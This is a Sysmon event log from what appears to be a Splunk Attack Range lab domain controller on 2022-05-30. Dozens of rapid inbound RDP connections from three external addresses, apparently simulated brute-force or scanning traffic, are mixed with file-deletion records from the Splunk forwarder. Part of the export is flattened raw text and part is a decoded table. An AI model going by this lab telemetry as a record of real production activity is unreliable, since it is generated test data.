SERVICEtcpfalsefalse185.100.87.231-47248-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099739Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:05:07.552{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-58428-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099738Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:07.495{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-58330-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099737Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:07.485{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-47104-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099736Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:07.431{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-47002-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099735Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:07.323{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-50278-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099734Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:07.312{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-58032-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 
354300x800000000000000099733Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:07.268{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-57968-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099732Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:07.265{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-50142-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099731Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:07.264{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-46674-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099730Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:07.241{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-50106-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099729Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:07.216{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-57876-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099728Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:07.188{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK 
SERVICEtcpfalsefalse185.100.87.231-46588-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099823Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:09.104{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-53632-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099822Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:09.083{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-50298-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099821Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:09.072{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-50228-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099820Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:09.061{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-53550-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099819Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:09.048{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-53508-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099818Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:05:09.042{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-50172-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099817Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:09.039{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-60802-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099816Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:09.035{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-53506-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099815Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:09.013{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-60746-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099814Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:08.990{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-50048-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099813Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:08.974{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-50016-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 
354300x800000000000000099812Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:08.972{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-60688-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099811Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:08.968{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-53408-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099810Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:08.952{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-60654-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099809Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:08.933{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-53354-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099808Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:08.915{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-60576-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099807Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:08.907{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK 
SERVICEtcpfalsefalse185.100.87.231-49878-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099806Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:08.802{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-49710-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099805Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:08.766{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-49636-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099804Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:08.762{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-53030-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099803Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:08.750{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-60318-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099802Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:08.741{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-52992-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099801Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:05:08.729{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-49544-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099800Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:08.728{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-60262-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099799Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:08.721{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-52936-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099798Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:08.698{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-52834-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099797Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:08.693{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-60218-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099796Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:08.680{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-49440-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 
Microsoft-Windows-Sysmon/Operational events from host win-dc-ctus-attack-range-994.attackrange.local (10.0.1.14), 2022-05-30, decoded from the flattened export. Records are listed in export order (newest first within each forwarder batch). Every record carries Version 5, Level 4 (Information), Opcode 0 and Keywords 0x8000000000000000.

Defaults for the Event ID 3 (NetworkConnect) rows, unless the row says otherwise: Image C:\Windows\System32\svchost.exe, ProcessId 368, ProcessGuid {326FD73D-A254-6294-0F00-000000005502}, User NT AUTHORITY\NETWORK SERVICE, Protocol tcp, Initiated false (inbound), SourceIsIpv6 false, SourceHostname -, SourcePortName -, DestinationIsIpv6 false, DestinationIp 10.0.1.14, DestinationHostname win-dc-ctus-attack-range-994.attackrange.local, DestinationPort 3389, DestinationPortName ms-wbt-server.

Defaults for the Event ID 23 (FileDelete) rows: ProcessGuid {326FD73D-A45C-6294-5601-000000005502}, ProcessId 6368, User NT AUTHORITY\SYSTEM, Image C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe, TargetFilename C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational, IMPHASH=00000000000000000000000000000000, IsExecutable false, Archived "false - insufficient disk space"; the row gives the MD5 and SHA256 of the deleted file.

RecordID  EventID  UtcTime       Source -> Destination / details
99795     3        13:05:08.668  185.100.87.94:52804 -> 10.0.1.14:3389
99794     3        13:05:08.666  185.100.87.93:60162 -> 10.0.1.14:3389
99793     3        13:05:08.656  185.100.87.231:49410 -> 10.0.1.14:3389
99792     3        13:05:08.632  185.100.87.94:52780 -> 10.0.1.14:3389
99791     3        13:05:08.632  185.100.87.93:60094 -> 10.0.1.14:3389
99790     3        13:05:08.594  185.100.87.231:49290 -> 10.0.1.14:3389
99789     3        13:05:08.511  185.100.87.231:49126 -> 10.0.1.14:3389
99788     3        13:05:08.472  185.100.87.231:49046 -> 10.0.1.14:3389
99787     3        13:05:08.457  185.100.87.93:59844 -> 10.0.1.14:3389
99786     3        13:05:08.440  185.100.87.231:48982 -> 10.0.1.14:3389
99785     3        13:05:08.426  185.100.87.93:59808 -> 10.0.1.14:3389
99784     3        13:05:08.419  185.100.87.94:52434 -> 10.0.1.14:3389
99783     3        13:05:08.416  185.100.87.94:52448 -> 10.0.1.14:3389
99782     3        13:05:08.407  185.100.87.93:59758 -> 10.0.1.14:3389
99781     3        13:05:08.381  185.100.87.231:48850 -> 10.0.1.14:3389
99780     3        13:05:08.371  185.100.87.231:48848 -> 10.0.1.14:3389
99779     3        13:05:08.365  185.100.87.93:59686 -> 10.0.1.14:3389
99778     3        13:05:08.355  185.100.87.94:52254 -> 10.0.1.14:3389
99777     3        13:05:08.340  185.100.87.93:59640 -> 10.0.1.14:3389
99776     3        13:05:08.325  185.100.87.94:52178 -> 10.0.1.14:3389
99775     3        13:05:08.303  185.100.87.231:48694 -> 10.0.1.14:3389
99774     3        13:05:08.274  185.100.87.94:52104 -> 10.0.1.14:3389
99773     3        13:05:08.248  185.100.87.94:52046 -> 10.0.1.14:3389
99772     3        13:05:08.223  185.100.87.231:48574 -> 10.0.1.14:3389
99771     3        13:05:08.190  185.100.87.231:48458 -> 10.0.1.14:3389
99770     3        13:05:08.171  185.100.87.93:59374 -> 10.0.1.14:3389
99769     3        13:05:08.156  185.100.87.231:48414 -> 10.0.1.14:3389
99768     3        13:05:08.151  185.100.87.93:59348 -> 10.0.1.14:3389
99767     3        13:05:08.119  185.100.87.93:59286 -> 10.0.1.14:3389
99766     3        13:05:08.105  185.100.87.94:51796 -> 10.0.1.14:3389
99765     3        13:05:08.075  185.100.87.93:59226 -> 10.0.1.14:3389
99764     3        13:05:08.074  185.100.87.231:48300 -> 10.0.1.14:3389
99763     23       13:05:12.162  MD5=7356818CCECE793345B604CF70E0337A, SHA256=DE8413B87731FA97170947769947783DC8EBD527C256403EE48351A69EC3B4C5
99863     3        13:05:09.972  185.100.87.231:52016 -> 10.0.1.14:3389
99862     3        13:05:09.946  185.100.87.94:55246 -> 10.0.1.14:3389
99861     3        13:05:09.916  185.100.87.231:51916 -> 10.0.1.14:3389
99860     3        13:05:09.894  185.100.87.93:33920 -> 10.0.1.14:3389
99859     3        13:05:09.836  185.100.87.231:51756 -> 10.0.1.14:3389
99858     3        13:05:09.814  185.100.87.231:51708 -> 10.0.1.14:3389
99857     3        13:05:09.790  185.100.87.94:54966 -> 10.0.1.14:3389
99856     3        13:05:09.771  185.100.87.93:33762 -> 10.0.1.14:3389
99855     3        13:05:09.748  185.100.87.94:54866 -> 10.0.1.14:3389
99854     3        13:05:09.732  185.100.87.94:54856 -> 10.0.1.14:3389
99853     3        13:05:09.708  185.100.87.94:54800 -> 10.0.1.14:3389
99852     3        13:05:09.680  185.100.87.231:51418 -> 10.0.1.14:3389
99851     3        13:05:09.675  185.100.87.231:51410 -> 10.0.1.14:3389
99850     3        13:05:09.664  185.100.87.94:54726 -> 10.0.1.14:3389
99849     3        13:05:09.625  185.100.87.231:51292 -> 10.0.1.14:3389
99848     3        13:05:09.607  185.100.87.94:54608 -> 10.0.1.14:3389
99847     3        13:05:09.604  185.100.87.93:33474 -> 10.0.1.14:3389
99846     3        13:05:09.576  185.100.87.231:51198 -> 10.0.1.14:3389
99845     3        13:05:09.542  185.100.87.231:51144 -> 10.0.1.14:3389
99844     3        13:05:09.521  185.100.87.93:33370 -> 10.0.1.14:3389
99843     3        13:05:09.506  185.100.87.231:51088 -> 10.0.1.14:3389
99842     3        13:05:09.478  185.100.87.93:33300 -> 10.0.1.14:3389
99841     3        13:05:09.445  185.100.87.94:54294 -> 10.0.1.14:3389
99840     3        13:05:09.401  185.100.87.94:54194 -> 10.0.1.14:3389
99839     3        13:05:09.389  185.100.87.94:54182 -> 10.0.1.14:3389
99838     3        13:05:09.379  185.100.87.231:50808 -> 10.0.1.14:3389
99837     3        13:05:09.377  185.100.87.94:54146 -> 10.0.1.14:3389
99836     3        13:05:09.376  185.100.87.231:50784 -> 10.0.1.14:3389
99835     3        13:05:09.330  185.100.87.231:50728 -> 10.0.1.14:3389
99834     3        13:05:09.317  185.100.87.93:33030 -> 10.0.1.14:3389
99833     3        13:05:09.306  185.100.87.93:32996 -> 10.0.1.14:3389
99832     3        13:05:09.300  185.100.87.94:53998 -> 10.0.1.14:3389
99831     3        13:05:09.277  185.100.87.231:50636 -> 10.0.1.14:3389
99830     3        13:05:09.262  185.100.87.231:50620 -> 10.0.1.14:3389
99829     3        13:05:09.261  185.100.87.93:32936 -> 10.0.1.14:3389
99828     3        13:05:09.260  185.100.87.94:53912 -> 10.0.1.14:3389
99827     3        13:05:09.243  185.100.87.93:32914 -> 10.0.1.14:3389
99826     3        13:05:09.220  185.100.87.231:50494 -> 10.0.1.14:3389
99825     3        13:05:09.200  185.100.87.93:32840 -> 10.0.1.14:3389
99824     23       13:05:13.287  MD5=D067246FABD34B9E6FD9EFE7EC33037A, SHA256=3194E8B467416FEEECF81428DCB65FC28E3923FD77FD4B333F8D20F44A31D2AE
99898     3        13:05:11.136  outbound (Initiated true): Image C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe, ProcessId 6180, ProcessGuid {326FD73D-A455-6294-3701-000000005502}, User NT AUTHORITY\SYSTEM, tcp, 10.0.1.14 (win-dc-ctus-attack-range-994.attackrange.local):53338 -> 10.0.1.12:8000 (DestinationHostname -, DestinationPortName -)
99897     3        13:05:11.102  185.100.87.231:54350 -> 10.0.1.14:3389
99896     3        13:05:11.093  185.100.87.94:57502 -> 10.0.1.14:3389
99895     3        13:05:11.019  185.100.87.94:57348 -> 10.0.1.14:3389
99894     3        13:05:10.997  185.100.87.94:57320 -> 10.0.1.14:3389
99893     3        13:05:10.918  185.100.87.94:57156 -> 10.0.1.14:3389
99892     3        13:05:10.854  185.100.87.231:53834 -> 10.0.1.14:3389
99891     3        13:05:10.801  185.100.87.94:56898 -> 10.0.1.14:3389
99890     3        13:05:10.793  185.100.87.231:53712 -> 10.0.1.14:3389
99889     3        13:05:10.779  185.100.87.94:56848 -> 10.0.1.14:3389
99888     3        13:05:10.728  185.100.87.94:56756 -> 10.0.1.14:3389
99887     3        13:05:10.723  185.100.87.94:56716 -> 10.0.1.14:3389
99886     3        13:05:10.692  185.100.87.94:56654 -> 10.0.1.14:3389
99885     3        13:05:10.616  185.100.87.94:56530 -> 10.0.1.14:3389
99884     3        13:05:10.557  185.100.87.231:53260 -> 10.0.1.14:3389
99883     3        13:05:10.507  185.100.87.231:53174 -> 10.0.1.14:3389
99882     3        13:05:10.487  185.100.87.231:53114 -> 10.0.1.14:3389
99881     3        13:05:10.427  185.100.87.94:56186 -> 10.0.1.14:3389
99880     3        13:05:10.422  185.100.87.94:56164 -> 10.0.1.14:3389
99879     3        13:05:10.410  185.100.87.94:56158 -> 10.0.1.14:3389
99878     3        13:05:10.381  185.100.87.94:56088 -> 10.0.1.14:3389
99877     3        13:05:10.370  185.100.87.94:56070 -> 10.0.1.14:3389
99876     3        13:05:10.306  185.100.87.94:55904 -> 10.0.1.14:3389
99875     3        13:05:10.260  185.100.87.231:52626 -> 10.0.1.14:3389
99874     3        13:05:10.214  185.100.87.231:52556 -> 10.0.1.14:3389
99873     3        13:05:10.183  185.100.87.93:34390 -> 10.0.1.14:3389
99872     3        13:05:10.167  185.100.87.231:52448 -> 10.0.1.14:3389
99871     3        13:05:10.131  185.100.87.231:52336 -> 10.0.1.14:3389
99870     3        13:05:10.112  185.100.87.94:55566 -> 10.0.1.14:3389
99869     3        13:05:10.107  185.100.87.94:55512 -> 10.0.1.14:3389
99868     3        13:05:10.088  185.100.87.94:55498 -> 10.0.1.14:3389
99867     3        13:05:10.054  185.100.87.93:34202 -> 10.0.1.14:3389
99866     3        13:05:10.041  185.100.87.94:55426 -> 10.0.1.14:3389
99865     3        13:05:10.023  185.100.87.94:55388 -> 10.0.1.14:3389
99864     23       13:05:14.427  MD5=519CEC48120EFB8A218DD46F6D126CE3, SHA256=CE740ECB6FF5914A72D2E5BBE0C931FCBA8CE12BC404AA3788D271F0C9FAC74A
99904     23       13:05:15.568  MD5=5F865FA246E3CD0616F578F6F561637F, SHA256=D85A83758885826E2A45B6E0C08F0C176E11BCFBEAB664C3FD037CE7B34360D6
99903     3        13:05:11.723  185.100.87.94:58678 -> 10.0.1.14:3389
99902     3        13:05:11.584  185.100.87.94:58430 -> 10.0.1.14:3389
99901     3        13:05:11.448  185.100.87.94:58196 -> 10.0.1.14:3389
99900     3        13:05:11.363  185.100.87.94:58042 -> 10.0.1.14:3389
99899     3        13:05:11.243  185.100.87.94:57812 -> 10.0.1.14:3389
99907     23       13:05:16.662  MD5=461102E569CD611382CE4C235DD234A4, SHA256=EA6045BDD6732EDC48EB59B9BC3A409212EFF133CC2AEB78CBAD0671F057B52D
99906     3        2022-05-30 (record truncated in the export after the date)
13:05:12.125{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-59554-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099905Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:11.792{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-58842-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 23542300x800000000000000099908Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:17.755{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=49C61F45858941A74EABB9F4028FA21F,SHA256=052D2F39D83E6EA382C26198A86485C381CA82DDAFF338223B9E0C19AD3B7057,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000099910Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:18.849{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8DF1949211D0E5706E95DCB2A9F94FBB,SHA256=646B7EB84A891B6CFB6B503C857D3230880BE07A85C620400F8AAF2B70217BF7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000099909Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:18.537{326FD73D-A44C-6294-0501-000000005502}5164NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program 
Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=29F4984D9A3F0C9901FC056FBA6C93C1,SHA256=0C82F0BA808DFB25A03BFA359B6BE47A59607D83579B4EFCC6B3276E0A91051F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000099912Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:19.943{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A940AC29A9C0C102E8CC9972359DFF74,SHA256=234124B10AF7F269104F9B606A998D6E35B907E4D30F0E1494E03E219DB7BE60,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000099911Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:19.084{326FD73D-A254-6294-1100-000000005502}104NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=CA6B83CB4B6D3E0DDA4F239FB22F76B8,SHA256=A8FF2E6D39AC1E7BF3CB5A0367D4AFC3BE73DB7B82B6A3EA6EB9C816D80525CB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000099913Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 